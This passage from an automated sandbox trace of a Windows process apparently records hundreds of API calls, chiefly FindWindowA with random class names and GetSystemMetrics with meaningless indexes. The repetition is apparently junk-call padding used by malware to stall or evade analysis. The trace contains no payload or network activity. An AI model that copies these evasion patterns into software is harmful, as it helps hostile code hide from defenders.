(lpClassName="3WfdXCHDPQPeQ8Hzynx6mMA0N7j95k7Ai4Z93xaG0PEPp1ZNxGFFhR1QMD6Wuzlezf98VVWnE", lpWindowName="YKI4JSgVS0qZFUD7BQv0TPW4sVCdFsdgaixwB9dyCCsn00KTMZMvbcowhjvKL4au1o6yALKxH") returned 0x0 [0308.489] FindWindowA (lpClassName="R85PlbWG9mVUhDpTNHVcrOHYmmgZ0TwQHuylQvPuof9VjztUg5Wq0L8hVnUsngdq6ON7GZ3fb", lpWindowName="zSJsfumcgLBzVfQv2MeiKlEOowgmHlpblyDwOvqaIegkroPTZZPyeZjCzIKAtaBnf44veM0gC") returned 0x0 [0308.489] GetLastError () returned 0x57 [0308.489] GetSystemMetrics (nIndex=38759223) returned 0 [0308.489] GetSysColorBrush (nIndex=57955878) returned 0x0 [0308.489] GetSystemMetrics (nIndex=26833555) returned 0 [0308.489] FindWindowA (lpClassName="p5rVitT7qS6HVFpazsCxRBW8B9EZF9cieLr3N4dvVM24tZMkytGETz3g9YtwPrNZH0cPG0rNl", lpWindowName="m83uv8WaDDx47SfOAI8xkpL5gdRpIXJ6ztcvK8XzZbBbDr9YDQSYwvlefn03A5SQmAsorh9hw") returned 0x0 [0308.489] FindWindowA (lpClassName="TY1SH4aSk6eXu8RAumtZfM15K4r9Xc2PkfrYQWDPotZIWI7qF4VkHbXt18J7NQQkGwrJFxR6N", lpWindowName="jM2zbncOGIWhSQHa53zPevMKwfbxzgyMxVMMkTRm0MKHCqzT0P5A2R8GpaaiWPLwDTAgZw3Yz") returned 0x0 [0308.489] GetLastError () returned 0x57 [0308.489] GetSystemMetrics (nIndex=65268258) returned 0 [0308.490] GetSysColorBrush (nIndex=85758254) returned 0x0 [0308.490] GetSystemMetrics (nIndex=83799893) returned 0 [0308.490] FindWindowA (lpClassName="BsORXtJTrPEvpoeCYHjZQnWIgNsQjiC0Y82GV5gMZ8pHG8vmB5uwGp1a83XIdD9d9dqvxWr1i", lpWindowName="SVgHCispIM9oCIpxKMcjIlYnFhGiU3Q1VBLAljpV00j6Gx2xDOyFyOIb5anh2CV0AgLTfbnLj") returned 0x0 [0308.490] FindWindowA (lpClassName="UvJTquguZlHg4yALGqKDZGxoOe4ZYyjogess9IUg7z2jqhEfxVJqn0Hiqfbroh4tkBMlNG8fs", lpWindowName="m9qx2ctP2HfowD8t408oH1PmUbEzvO2D3GWHdcVy3pukiyS5crtybk1crWfrFTqQfhtdHTwRW") returned 0x0 [0308.490] GetCurrentThreadId () returned 0xbe0 [0308.490] GetSystemMetrics (nIndex=65764388) returned 0 [0308.490] GetSysColorBrush (nIndex=83933799) returned 0x0 [0308.490] GetSystemMetrics (nIndex=45276526) returned 0 [0308.490] FindWindowA (lpClassName="hREY7DLgjznUiKDG0mzmTJq4s8uQ5NLHrYzX4l28T8yGh5UaY0bytXhWmqflCvCViHKEtXTFK", lpWindowName="STB2EN0BCAquxpxf2AzCDJAs36iL06SiqRTTdrDnouIVLqOmUdgZXtS53IvDgj5ogqoUe3CHa") returned 0x0 [0308.490] FindWindowA (lpClassName="Wgxsxcwv8s0G9s83W4BNn3SyYcW0uxdCAB7nmt6658emjMaKXwNEFXgz2lIG41uJDsKLEubuH", lpWindowName="DPCZEYIFmh2KNfmJlqzWBvCXJxhZFaBpm1eHxtWPB1ItdsWlhi1vhT8FDDaKoHW2rLc6AvePJ") returned 0x0 [0308.490] GetCurrentThreadId () returned 0xbe0 [0308.490] GetSystemMetrics (nIndex=47297938) returned 0 [0308.490] GetSysColorBrush (nIndex=59877495) returned 0x0 [0308.490] GetSystemMetrics (nIndex=74653357) returned 0 [0308.490] FindWindowA (lpClassName="Etz2meRpfwY3Rb07xoQ3jKRkDmupQrNsL1TmvYOZ5bL8lGfUOE5CIZLk4Nnar1jbJBuF9sP2w", lpWindowName="WU1bTwDwHKElzSSjBbvvi6X9ISz24DSpKSKQEDc8MolsspWqMwo2iSKoUn9jvXWnvbW0F0GH0") returned 0x0 [0308.491] FindWindowA (lpClassName="EBt9S4DDQn19BblMuJs5c7LaHJ16TfkhzGDow7MneyNKzVlqet7FFsSNUVpy2I03lOJjOpuPR", lpWindowName="eNks7VZXGlnNqrOvpwNoiWqo3oHv84DQbhKSq6klv47OZi9wBBJYKEnxxuV1mj3g9vBJ2LTPn") returned 0x0 [0308.491] GetLastError () returned 0x57 [0308.491] GetSystemMetrics (nIndex=97362543) returned 0 [0308.491] GetSysColorBrush (nIndex=25834256) returned 0x0 [0308.491] GetSystemMetrics (nIndex=55642834) returned 0 [0308.491] FindWindowA (lpClassName="vxr08IES8jYNcr34xTft0d7ghZBWAv7vOaXryg6JJ69ehAZ8Ki063ra5c2DUIIq03fCdDDxaA", lpWindowName="PgWc6rzt26xoiruLrwxOPOKHqlvPsLsT7izFsP1j106ZpPpKU04KOk5Ua7LIrTuVH18CBktRr") returned 0x0 [0308.491] FindWindowA (lpClassName="hFO98XklvxFefZOTsKRPeWWsM3OLWrHd54Wg8NLSJh1DSdB7XbnwEP4cmXFQCLWMLzbV9NINA", lpWindowName="RWGap93S25ue9CHBn2TeWlQjRFp6NMgQ3msl2PbixNNgVGNTDB2hvzsojL6BYOXXsqwblyU7a") returned 0x0 [0308.492] GetConsoleWindow () returned 0x0 [0308.492] GetSystemMetrics (nIndex=62655739) returned 0 [0308.492] GetSysColorBrush (nIndex=63964286) returned 0x0 [0308.492] GetSystemMetrics (nIndex=95765539) returned 0 [0308.492] FindWindowA (lpClassName="dJcsdaMWTYl813lLKht9uAei8rVtXJOAY0Q0nty9AGV3sUy2pvuLt3xiHftn6bToDkmNAP2sa", lpWindowName="3iHjRVj1XkJTGzE0j64tbu25jjZXVOeAzwnAbjJVMzP0MMHqzIctsRDuwHN65dwg6TacFe8b9") returned 0x0 [0308.492] FindWindowA (lpClassName="CIbMJM2jDOyQWPJR2v94gbqtMrEOZtiaW19dbQQTj1beZjVLzgDozOFU45xIJwqk3ZRWZ4KGn", lpWindowName="wq8azNDkAqF0sTAMG6DFeM58ZjzJuQpSv9lVUkEBM4m2s0GufdkpgZgQIUlEhtGZw2HsSkaFh") returned 0x0 [0308.492] GetCurrentThreadId () returned 0xbe0 [0308.492] GetSystemMetrics (nIndex=26825597) returned 0 [0308.492] GetSysColorBrush (nIndex=22889233) returned 0x0 [0308.492] GetSystemMetrics (nIndex=88837862) returned 0 [0308.492] FindWindowA (lpClassName="EurTVeLZxQhOFrvVD5x00LFEPhJON60tmzqU5sNZ8KXPYCygq74cjIhqneoAFEjoU7kdsPcw4", lpWindowName="t7j7MGSqqiQRFfZ82BUw5rnb6hFmvUR6NZo9omhFFnpl83MXmakYTTOrAd689CmHTtydggFaf") returned 0x0 [0308.492] FindWindowA (lpClassName="xErGsRiYKLXdQrqTDb3XUV4HH6Nb2j4xTLIs01QcCwnyGeJ4V5IjARNj3Kepf3CmNa0vyQmHM", lpWindowName="UfwJKotgKDMCDN1yCebDYfJ9zyHTbCT79XDtdRKA4zXniEa8uj4ePKTKZu5ziMWLCVnHxwITN") returned 0x0 [0308.492] GetCurrentThreadId () returned 0xbe0 [0308.492] GetSystemMetrics (nIndex=45493883) returned 0 [0308.493] GetSysColorBrush (nIndex=35666884) returned 0x0 [0308.493] GetSystemMetrics (nIndex=59824376) returned 0 [0308.493] FindWindowA (lpClassName="4uis42nxhWgRrdYJlqOoUdDhD6Z6bj8qIiwmZrSFT83WXNgkENYKOHSYRyRzUVBucWbP9EVgm", lpWindowName="4tHEtTWQ8ZJX4nopK0o5sJmkTwnYMwZakBN0WKu601Va9BBBjxNCNM5C4gNo9LtxEO6FqsGEr") returned 0x0 [0308.493] FindWindowA (lpClassName="hBy6oisO1wyI3nNDSdo7stJKiya5KCdJ6qQw9f0QNQebqDwFfmvPhGlhvBXzxaOIRk6uTeNuY", lpWindowName="vj7aNVCESml51o0AagGwTPE1owHmNu5jZuidK4jDXvhyeUzfKtepCoHnTwzMAfXEYbKnYyCku") returned 0x0 [0308.493] GetCurrentThreadId () returned 0xbe0 [0308.493] GetSystemMetrics (nIndex=23298385) returned 0 [0308.493] GetSysColorBrush (nIndex=76964785) returned 0x0 [0308.493] GetSystemMetrics (nIndex=66457786) returned 0 [0308.493] FindWindowA (lpClassName="pVS51yOdk7N0SWxx1SpToxqfaMeu3B5sybEhceRawHjmytCECYVFbt5ZKdx64KdN9CVkLUEVZ", lpWindowName="KZ35zGr1Zrl25aeXGtvXptI68kTbSEJebcUdDgDLuuX6eFKu9x3MELFsUDPUOrnUZi57ohfe8") returned 0x0 [0308.493] FindWindowA (lpClassName="uT65bvePvrQoDTciQ1Ee3vSx7pvtDamdMz5FGsDMLM1dtVjhna5fc39NL6GVDj4ABgYMsX0ld", lpWindowName="176rBfgiuujLnk9w1iPmkx9SSSSgkEd59kUeriQvdOKsuiWmW8LodasTrC0jfAtIJLQZuRiZ8") returned 0x0 [0308.493] GetCurrentThreadId () returned 0xbe0 [0308.493] GetSystemMetrics (nIndex=49979359) returned 0 [0308.493] GetSysColorBrush (nIndex=55445993) returned 0x0 [0308.493] GetSystemMetrics (nIndex=23955332) returned 0 [0308.493] FindWindowA (lpClassName="fr3WnGp1F3l0ZgsoPd0MaPr0hY9nGV2lhd3N2F7gibJHYmvyuqmCygnUvzwgQJOVOp6EN9jNT", lpWindowName="XG2ELkwqthl2BTI2sBpKpUoLVx6d96DOcEKP8TG1ZsARy6fdSqo8QplLXW00DsDvUDu5n3fWT") returned 0x0 [0308.494] FindWindowA (lpClassName="KlXfJJbSvvp9aTfOFscrkOSM82QHPP8EURqqTht1dDqCP0tKyTvJuqTxVxocCub5aYJGlJJQ5", lpWindowName="yNhc0g1ZxS0ObYc4WGkUU8fzGnvwA60YgUoj75Lrn8Ak38O2OMJPd3ZcpARQJpIKmaoT7DkWk") returned 0x0 [0308.494] GetCurrentProcessId () returned 0xf94 [0308.494] GetSystemMetrics (nIndex=67723979) returned 0 [0308.494] GetSysColorBrush (nIndex=35853928) returned 0x0 [0308.494] GetSystemMetrics (nIndex=96562726) returned 0 [0308.494] FindWindowA (lpClassName="aena9fudgYixyEV6HnO6J3WSgsAvKPccUC5BwSGhuGWhkt2QEsQK0QCitZsofi3jZFZpay84i", lpWindowName="sXF9EU05Di1htxkgej0WCKVjd1piJE6N0SSRax0vqizV0r1cM7YVGFFUvfQwvsLv11v061W4r") returned 0x0 [0308.494] FindWindowA (lpClassName="hiTQ6Eo6WgiA1phRXnkAh4pEgsbKhp4AxqrMrhGWKVFekasCOBFPqoAvJ9me2vpWhStPyMqZ4", lpWindowName="KV3YsJwRYWnirT1ffk7DClDzS3jCxU98Smd9Xt3LeMfwQBtyp0kLIXrxMVbCn7dAjhfZRk0Pw") returned 0x0 [0308.494] GetCurrentThreadId () returned 0xbe0 [0308.494] GetSystemMetrics (nIndex=98976692) returned 0 [0308.494] GetSysColorBrush (nIndex=86662443) returned 0x0 [0308.494] GetSystemMetrics (nIndex=92997287) returned 0 [0308.494] FindWindowA (lpClassName="lDeLSbT8SbJUKj1ZKC6G9WhrqAxIBM60WCp2DiULDDM2PSDQufYFl1qmAcap6kImqPV9lJ6mK", lpWindowName="nWQEQ5z3jJqwRbsxAd8Z9TtX7E4vKSAv9mhXDR4oZndjB0lXa56IygOveMk3XVP6FIpCqvJRI") returned 0x0 [0308.504] FindWindowA (lpClassName="xk6j2djKHyuJacrsrrSEcAA23TT4lqSjabscU6u5qh6pYlLCepT0NLnfF82RpE4N4wzIw7mIu", lpWindowName="kkHd5bOOxPVtJTpunwyjvMJUH3LIw9UEbP7RzEbycopLeppkQUzLhSC7qpWfcoaEnphSwOCmm") returned 0x0 [0308.504] GetConsoleWindow () returned 0x0 [0308.504] GetSystemMetrics (nIndex=67873889) returned 0 [0308.521] GetSysColorBrush (nIndex=38456368) returned 0x0 [0308.521] GetSystemMetrics (nIndex=46937685) returned 0 [0308.521] FindWindowA (lpClassName="A9TFMkSx0GiXrHRlJanjq0WWRhz4LmXXNe0IVr0WZgdcVpEshVNnfMxnz60a8Na1Czu2zzye6", lpWindowName="4JObhcHGs86ArzLZ8oo75Z0ZnlkW5zMRYLlgp6I4W3SGt404cFNGvDWNpuf4EnUxk5aJFukwt") returned 0x0 [0308.521] FindWindowA (lpClassName="xeNsXhNyhRAk2Yr0f3PRAzFbgAGWIiQnbKHBgu1S4rMubDIag95oikAosBSsHDBrmY6WgBF8b", lpWindowName="Ox341Bxs0fHkKTKPGNKtLHKqlVFDXb7L9oTrdlAriOnu1PtXKvxboLNZgoNxpjfCufA4fTDnt") returned 0x0 [0308.521] GetCurrentThreadId () returned 0xbe0 [0308.521] GetSystemMetrics (nIndex=32272549) returned 0 [0308.521] GetSysColorBrush (nIndex=33696267) returned 0x0 [0308.521] GetSystemMetrics (nIndex=78368442) returned 0 [0308.521] FindWindowA (lpClassName="da1xUzI0ME3ABtD9qKtdI0QMVCmu1iCGwup5T27ErbX9BUP7DwNoVxWOiZJWAKZnfFHwvZ6G6", lpWindowName="7KAhVhj1I9xdTmvk9VjDGKO3yQh0BmWdDkIxxC4qZpw8aaKJTJSx3rA5CnTUKgyK5QQwjjaF8") returned 0x0 [0308.521] FindWindowA (lpClassName="4IzRBumJa2quG6a7OpIfew6SsTWnEkJuBeTkvcVVmsAqZ8XCKa1qCAZ5Cbg83fN04NdvWeDKc", lpWindowName="M8xfLX6eiFU4fBatCfz4rGprcJoUf1qP4HzdNRASN3C6XPWw35bxEZz7saPfzeOkZ4R02v5XM") returned 0x0 [0308.521] GetConsoleWindow () returned 0x0 [0308.522] GetSystemMetrics (nIndex=93947574) returned 0 [0308.522] GetSysColorBrush (nIndex=59258244) returned 0x0 [0308.522] GetSystemMetrics (nIndex=82974296) returned 0 [0308.522] FindWindowA (lpClassName="bgCfXRpG3MhovsHlDDfNBk04qbH0tZLyBVHbisMt6qCwy9PGxvwZ1JuWoM9X4NZWJYxsZ9Qgf", lpWindowName="KEb2pCsOn5GFuW3zpPaatNle7p95lzBUpchx2wk43s3iOUK4rfFjv3Us1mBYSBCQ31F1lGKI9") returned 0x0 [0308.522] FindWindowA (lpClassName="zzFM95lYrKuhGtvDbbTnTXY0IPR6J6tkabhSBntU04vWNdWmhiuV9NdQuv4QuLYUNXTKvo4AL", lpWindowName="ts0AwRZ4EpPkqOcLlzzXczpS6aVBepdJqH42KmHtja2TkwCAG1K39IYp6ur6G8stIJScNq13E") returned 0x0 [0308.522] GetCurrentProcessId () returned 0xf94 [0308.522] GetSystemMetrics (nIndex=98698632) returned 0 [0308.522] GetSysColorBrush (nIndex=53936922) returned 0x0 [0308.522] GetSystemMetrics (nIndex=57386542) returned 0 [0308.522] FindWindowA (lpClassName="M1U2MqpOhePXsFR2NvMRKGE0YaewOPCNVY3jDzzZXts2uoDrmNXiE36ZUykPf3sjJZDGji7Fg", lpWindowName="5NcZ0B4DJkmqZFYbxMFIAgunaLgvecOOxmDnwyMx0NMr1SJvFUSCSekuxVgOY8vO9wANr0BbN") returned 0x0 [0308.522] FindWindowA (lpClassName="rmoks31jrc1Szv4cLLpf6P0v7NoH9kVPVdTdjD5iGHqyyaR27KICp3LH9UkWDuCNX05LBVtVc", lpWindowName="7RiGWBoMqWklaFFpC9vJErOxAxGbdU9ceiEQ5MzOciSqn3cq49lIiw7LjdOwUzmwigtJKIFtn") returned 0x0 [0308.522] GetCurrentProcessId () returned 0xf94 [0308.522] GetSystemMetrics (nIndex=85598575) returned 0 [0308.522] GetSysColorBrush (nIndex=66592787) returned 0x0 [0308.522] GetSystemMetrics (nIndex=69368367) returned 0 [0308.522] FindWindowA (lpClassName="dQOn1SHDLML0tdlmyoXz4mwzW0ux2reztbQMd9tGdw448nVZhR4SrqDE13ydlvbxBPeKIuAuf", lpWindowName="SbDXKIIzihD0tLkN4zhKrqQ5XvZ5wKMrJnHhMDgoaPcC1Af6txVcSlcxpiXKCy4Lx0HYIQlqX") returned 0x0 [0308.522] FindWindowA (lpClassName="7s4AmNMnAgeFMi0XxQ4NJOvA8GRb33ukYm25ifkQHX2RFyiU5Vc8uo0RYoN8qKOkCGdiqJoNF", lpWindowName="nJBYau9pNGADgZBXNb7zwKkKQtGTObJFGbnJ4058OUejld62G2aF0gH331dpRzJUY0rHp2DJY") returned 0x0 [0308.522] GetCurrentThreadId () returned 0xbe0 [0308.522] GetSystemMetrics (nIndex=99736626) returned 0 [0308.522] GetSysColorBrush (nIndex=25755247) returned 0x0 [0308.522] GetSystemMetrics (nIndex=79933897) returned 0 [0308.523] FindWindowA (lpClassName="eK8FiPwiGrlntAfAGa34PFrs8lBYIdfKbFmpafCDNKSmHg4yDLBeWpihN0tQfHserg3PIBWGN", lpWindowName="3mqIzIJ0W4tpNHUR860ewMrJ4FxiaQDKL894NutdD2H2JxI2qDuEgRiSQSlWY5SCk8T859i09") returned 0x0 [0308.523] FindWindowA (lpClassName="frPqHJZYaMBNK1iXZL4ANsS21uD9Mtp2VzxQIMRmH0r1Hy55zODtwAsoIZ8jdX2i5l40Sp2bK", lpWindowName="oSJDXYSCxiw6jM3PhtOg3asEoXv2rqhTqLgPF83SNTgwiXD3sIsKcS8sLizAOrDitBLcba7X5") returned 0x0 [0308.523] GetLastError () returned 0x57 [0308.523] GetSystemMetrics (nIndex=68342633) returned 0 [0308.523] GetSysColorBrush (nIndex=32394487) returned 0x0 [0308.523] GetSystemMetrics (nIndex=93256544) returned 0 [0308.523] FindWindowA (lpClassName="FEDLmaugyBHFbwf84kTg47KCo8o7trurQyyRx0Ciup3vKIFFFeKznRscLXNP3YD6EIcDlGt9J", lpWindowName="bmMcA1KT2IREtuGahBX4rRNU2ccBjZ9kEqVDZHS1EaJt43KRBuPM0rNZxOTjaADvE5hxc9XUB") returned 0x0 [0308.523] FindWindowA (lpClassName="3wVG58W1dXVQ7T2jiSnzFCCwJkzVvCZbeeS5vffY8pji5rXgWipVLkwZQjx7RvgslSnHiiQGr", lpWindowName="EewwNhG4uEAcypCT1pUMsEaKrh3alz9FHZGaFIWhett4BtZ5AaKvmfGNJxxbarDKFWUCIgBn2") returned 0x0 [0308.523] GetConsoleWindow () returned 0x0 [0308.523] GetSystemMetrics (nIndex=24293529) returned 0 [0308.523] GetSysColorBrush (nIndex=34438287) returned 0x0 [0308.523] GetSystemMetrics (nIndex=38523224) returned 0 [0308.523] FindWindowA (lpClassName="wxZnBRdySNu1uojQxu0MOAV8oBgeLkSEWKonGoCLJywdUnEpjGZG8mtBqPyTmio5PT4GvVPqn", lpWindowName="ZcSvindNkGxHlY4wNqaN77FCgUkEDDzrKXqOfF7smiAEyT2kOtSTo66Lrcr5yjOQco3Vj0aPi") returned 0x0 [0308.523] FindWindowA (lpClassName="0EG3ERUqSlBTBs8OlHwtJVUdOCxPgrwVuBlKIcHIWv6asuC9lnyBdWmwBnScbIFVUAq20Qxw2", lpWindowName="1rMPs31BtvN2ai3f5y0zWbT3j3jcJ2Fbua51hlVSQI8vJuWzCsLvVIfLUzW0vCLxEZ2nOkmhg") returned 0x0 [0308.523] GetConsoleWindow () returned 0x0 [0308.523] GetSystemMetrics (nIndex=28722432) returned 0 [0308.523] GetSysColorBrush (nIndex=39462595) returned 0x0 [0308.523] GetSystemMetrics (nIndex=77358547) returned 0 [0308.524] FindWindowA (lpClassName="uC0ZsWhuaWQjBlmhoP6fb3v9QPCqionZadzbJGeg4xNHyuMe8MgBgXmyQCnKZcv4wr457Yqu5", lpWindowName="o91Fr8lHugbosFMc4qmj80di0rRdeuJB9ObSaxdANP0Ya0fOJONduMErxhqivOP0tYe9HoR27") returned 0x0 [0308.524] FindWindowA (lpClassName="WpbHFGm4Fgic7P9ZyGpUGU3woxS8nXNHaO88h22ADBjH3LRgs1dKNVcESA31z9CpVS0z60E28", lpWindowName="Y50XGY9nyB17twsevu29aHSfT4CWQQpXjsW9DoxWhYQK4Hpo1EvgIsU5c5jagz9xzofxz3MCR") returned 0x0 [0308.524] GetCurrentProcessId () returned 0xf94 [0308.524] GetSystemMetrics (nIndex=36635427) returned 0 [0308.524] GetSysColorBrush (nIndex=23986374) returned 0x0 [0308.524] GetSystemMetrics (nIndex=77763457) returned 0 [0308.524] FindWindowA (lpClassName="zE2bs7qtdvD94WYRVk0kRczPMm4e4rNPNAk9bSFKI9pt3LZ5YRfvQ9gnsqN6mNV3aP4ktSerT", lpWindowName="jpAzky1D66hCashmznna85uR8ymUZ3urrVVnN8vd8O8hkht0Cwl0wU33goE6Hlt2roonWiIDw") returned 0x0 [0308.524] FindWindowA (lpClassName="zho1G4DncXlyXRWzNtCpFtj9W9WpZj075BhEo6wCiskehrFomCxULrZBqpYjgss2Tr6J5bRRD", lpWindowName="UlCwzD0488aQayRgmAaIdtYHAUeZCt1EpYU91WcjwjzR1jxdVcEQtpCAwc1qHrQFkUZKwz7Fi") returned 0x0 [0308.524] GetConsoleWindow () returned 0x0 [0308.524] GetSystemMetrics (nIndex=56682788) returned 0 [0308.524] GetSysColorBrush (nIndex=43867827) returned 0x0 [0308.524] GetSystemMetrics (nIndex=34649729) returned 0 [0308.524] FindWindowA (lpClassName="3P9pCWdywwXIo9OrDuypUJ1dCyaIg6hsPFOtIqkyHdTGVUX74KD45m4KYmD5KzXxcJ303WXnA", lpWindowName="Fi7HIsKs7GrZAHA5MekyquGBu76J1kqJ3kNoDfICtZckIZM40tjg4AQebW1cLLTCnDBuU2O8Q") returned 0x0 [0308.524] FindWindowA (lpClassName="hzapzqpkV40D7kCpFtLhauCGW8YtzZAPqa8u6cUYZc0BhWRmm7x4RbGpd7fJM0FWyDKA0Fiqt", lpWindowName="jKgUskQgabTVnlEPtYAgwPwRz3yaBEK2LISUjNovhkGgCAjcKJBzPlDNOhw8tF1iMXOkyuvSK") returned 0x0 [0308.524] GetCurrentThreadId () returned 0xbe0 [0308.524] GetSystemMetrics (nIndex=39966579) returned 0 [0308.524] GetSysColorBrush (nIndex=85294975) returned 0x0 [0308.524] GetSystemMetrics (nIndex=57237936) returned 0 [0308.524] FindWindowA (lpClassName="ybtua93nII59rKim7xanAZAFA6RBMnMGhVNrqGUKFmhtS2fzqtgqueyVzMdVhByXpOlmoeyZK", lpWindowName="OUImBT7HVVfcORx9b0Ky8FnP0vATc6zuBphInkYkjwJEWzKyxMQBaHkw2lWzLPpS5yFU2Hrm1") returned 0x0 [0308.524] FindWindowA (lpClassName="i7gvhaLtwrK48ORYeUjCAU8LMNhobVXB9IjcaGN5YivQvwRX5ZaA6L3ZzXkUmtUEd0wEoNfL0", lpWindowName="8traZtf673JBaLz8RKrYYflqRSUTPLHr1pdgnzZAHl7SZM8XD8W5a8ZwKjQJnvTOx2GaB8FYy") returned 0x0 [0308.525] GetCurrentProcessId () returned 0xf94 [0308.525] GetSystemMetrics (nIndex=89677346) returned 0 [0308.525] GetSysColorBrush (nIndex=26294226) returned 0x0 [0308.525] GetSystemMetrics (nIndex=37472699) returned 0 [0308.525] FindWindowA (lpClassName="3AtNq51XLTXIxNi2pPT8mDUUjnC3jpV4UCok05SD6s58hfpohlI7WVYfjwnuRkvudHcIbDK4r", lpWindowName="D3ocCsKPlIsvVaYFXrYDc3HsSXlTbh49koLaq7zG6ctef8TA3iAuVSxUhTXhYDSWCsbSFNOF7") returned 0x0 [0308.525] FindWindowA (lpClassName="SnlQy54Z3R5VZFhSMYbwdROW00ggvyP21OPXtq5aQOLvrgsyMXI3cLP38nDtYJ6IzKXuwzOiP", lpWindowName="a59W1paYLaqC9V3dRHvragmD4UZhnJDnd2NtE1cigJ0GSMdZyBb1T93lX9W5DrUyNzLMdvrxg") returned 0x0 [0308.525] GetLastError () returned 0x57 [0308.525] GetSystemMetrics (nIndex=87722742) returned 0 [0308.525] GetSysColorBrush (nIndex=76678525) returned 0x0 [0308.525] GetSystemMetrics (nIndex=75926636) returned 0 [0308.525] FindWindowA (lpClassName="j9KvFBUHHHetaPMDuRMIBFVtQpkgcQYZeFJKF50YaLZixHgjpOHzc46SEcOVh1XKT3oQ9YdZP", lpWindowName="XXuoKA09nMxYyMBSSKPheBGKjQZbsCknHuocV1oWgZadbjwCnJoUK8COBc32Qu4z5FLhGsGn8") returned 0x0 [0308.525] FindWindowA (lpClassName="5ZqeEVXCvEUUlT3sTbOxZkeLZhKGGhWeapCdVK7EoDu8UUDGuwR81NN9rqaocOP3WYV9Ki3wF", lpWindowName="derhzwyBYU7R4lyHVh67dl5DjxtvlSCjjgTPxV8cd40uZAVTvhxz6NUhwKdcfmCRkPwDOMj8k") returned 0x0 [0308.525] GetCurrentProcessId () returned 0xf94 [0308.525] GetSystemMetrics (nIndex=54957873) returned 0 [0308.525] GetSysColorBrush (nIndex=44827659) returned 0x0 [0308.525] GetSystemMetrics (nIndex=88995556) returned 0 [0308.525] FindWindowA (lpClassName="dLydirwybxV6zwy6R6ts9dtHUaoYVUGA7KdNXy5KSQqfXNpAGmAMewKEmeWUWI7npasuAFTK6", lpWindowName="3KXS4RXWvLMfJVaWHfJ3naAH6GZ9oRqUdHo29NiVx6BXU8yhQlpKE3FZK76OjdeixQ2GeiN3Q") returned 0x0 [0308.525] FindWindowA (lpClassName="5hMccLdbDmfQXljZBCSdfcA0FJHIB5cocht8txX3J037MprpamEe6trwuVM9NpssUTIxUgpet", lpWindowName="VHsArm4VnqxZKnjbVOeNC2HzU8yvLlWPNKfYvxfFlfR9ptanGWINImNMtzQtdVN8gi6gFIfQl") returned 0x0 [0308.525] GetCurrentProcessId () returned 0xf94 [0308.525] GetSystemMetrics (nIndex=44395226) returned 0 [0308.525] GetSysColorBrush (nIndex=66466735) returned 0x0 [0308.525] GetSystemMetrics (nIndex=75785927) returned 0 [0308.525] FindWindowA (lpClassName="1zDtR8GCLdYgZ2STy3uYN3P6alzwuxhoqgzAOOJyN5vssfCL3IMPGEbYBHOIsXIBoyxuKZNI5", lpWindowName="5oEG3bVY3RoyAeV1kQ2eKw66OteEWkLRiCkH8gYuBVh4kq7ipnhP14n69DsTAjaYbcSaNGETd") returned 0x0 [0308.526] FindWindowA (lpClassName="3aV52CPt788BSuzJegUAyVE5t7hvR5QnhV6bWY5oxyIRM9EZRMJz7ZGtPIT29VwIbLAjgSDOv", lpWindowName="RwQbSjfhoDAYX4soDlBAenfgCmD5nFoiFcxbVHuCXv4lGWRvv72xsbFhljQEW89th3JtMN3jy") returned 0x0 [0308.526] GetCurrentProcessId () returned 0xf94 [0308.526] GetSystemMetrics (nIndex=34833599) returned 0 [0308.526] GetSysColorBrush (nIndex=64485277) returned 0x0 [0308.526] GetSystemMetrics (nIndex=59552795) returned 0 [0308.526] FindWindowA (lpClassName="USJZPdR3dI32aVj1j2MyL0PSnk2V9Ehyr5eByYJLmfavnl9PDrPvvr4A4mXb6RBE3GnzS4Nll", lpWindowName="TtZdNAAX1itxMM2qIRyNutbNXarHNhCwHLeQWDd8SmEZizyd0ojfJIdoHSi50NK4dXIuo6G7y") returned 0x0 [0308.526] FindWindowA (lpClassName="iaJOLGPCyJs8tCJ4ppre3iVHxj4DeRCd9ynRpxPDT7Q0PqGKl7tctrn9wbysHDMHZNoXBKk0R", lpWindowName="w94Lj7TuuqdJwc5QnPiXDL2shjBVOAclJME2e8hQs5c74A24lNk0dyeGfk69yrhWTZOb2n33f") returned 0x0 [0308.526] GetConsoleWindow () returned 0x0 [0308.526] GetSystemMetrics (nIndex=49469759) returned 0 [0308.526] GetSysColorBrush (nIndex=82344737) returned 0x0 [0308.526] GetSystemMetrics (nIndex=57742447) returned 0 [0308.526] FindWindowA (lpClassName="kzRuWZHHpszdA8AgCUpWJNNH99rHoqMiPGvcT3HQaDEIBZmX62p2PVpS9U6c0EoTIfuYE1Gz9", lpWindowName="Ry7w0KYo53f8g3JBHfu8Wo9wANAhjVEiN6CSJbD5iW7aw2M8GRrFzkPN77j3VolyEu55G7amE") returned 0x0 [0308.526] FindWindowA (lpClassName="bFnlp8nlNiuc1l2fs9ScfbuZLt4gAUsGUPuJ2PodJPa4PBsMQzgutWsiqk9vprFlc7a9bZQre", lpWindowName="LeCHw71QH1AqZhKqTmxITVvJjUyw8IoQZ5SEU5eJKeQg0mbhkZLfLn7siT865wyTN4YgTV3X6") returned 0x0 [0308.526] GetCurrentProcessId () returned 0xf94 [0308.526] GetSystemMetrics (nIndex=65788932) returned 0 [0308.526] GetSysColorBrush (nIndex=34249786) returned 0x0 [0308.526] GetSystemMetrics (nIndex=96394897) returned 0 [0308.526] FindWindowA (lpClassName="RofOQINge5pmyol0MB2oVMw8L3Nqd8sTmJG9VoxgBqTf8TbycFd1FvJHHSYLNNOKMqAQqHcNi", lpWindowName="cRU4EFXiDekJ3TdFcJUxBGesVbP8zkXSU9CePswDhQs8iDGo3rqPPhhmNrIHYdagMBstm5tpH") returned 0x0 [0308.526] FindWindowA (lpClassName="XLxPSKaDY8OyVSLCLx9qzWX7Y39FM1Zfsx5SvcnmoggorM1U51RmUM5tJt34cNSDREdiozwEK", lpWindowName="RUmj4YsuFJHCGRQOUls7H21KXyymfdbnvu5s1AtEEcxJIghMnitAT5n5IELkPvJiVfT9d0Kws") returned 0x0 [0308.527] GetCurrentProcessId () returned 0xf94 [0308.527] GetSystemMetrics (nIndex=73575785) returned 0 [0308.527] GetSysColorBrush (nIndex=57457726) returned 0x0 [0308.647] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x40) returned 0x5b2328 [0308.980] GetSystemMetrics (nIndex=25857272) returned 0 [0309.000] FindWindowA (lpClassName="REbbSqWy6yhKIDCdJOyapnxrpMCARCr4zdGc81tBDKsMlaZTXC1O8YFOGKjxRrJBdT3hVOfoa", lpWindowName="c8Wsa1xVPfvJcrgRYwTiizs2trQF69AzBlax3CF3EDNhm3soLBPh71YexuieaoEiIgxIX4a2d") returned 0x0 [0309.000] FindWindowA 